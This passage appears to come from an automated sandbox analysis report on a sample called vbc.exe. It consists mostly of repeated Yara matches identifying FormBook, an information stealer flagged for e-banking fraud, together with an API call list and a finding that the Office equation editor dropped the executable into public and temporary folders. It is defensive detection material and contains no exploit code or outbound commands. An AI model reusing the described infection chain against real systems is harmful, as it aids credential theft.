Source: C:\Users\Public\vbc.exe Code function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_00404E07

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669495000.0000000000330000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669355971.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.669436738.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Yara signature match
Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.510000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.1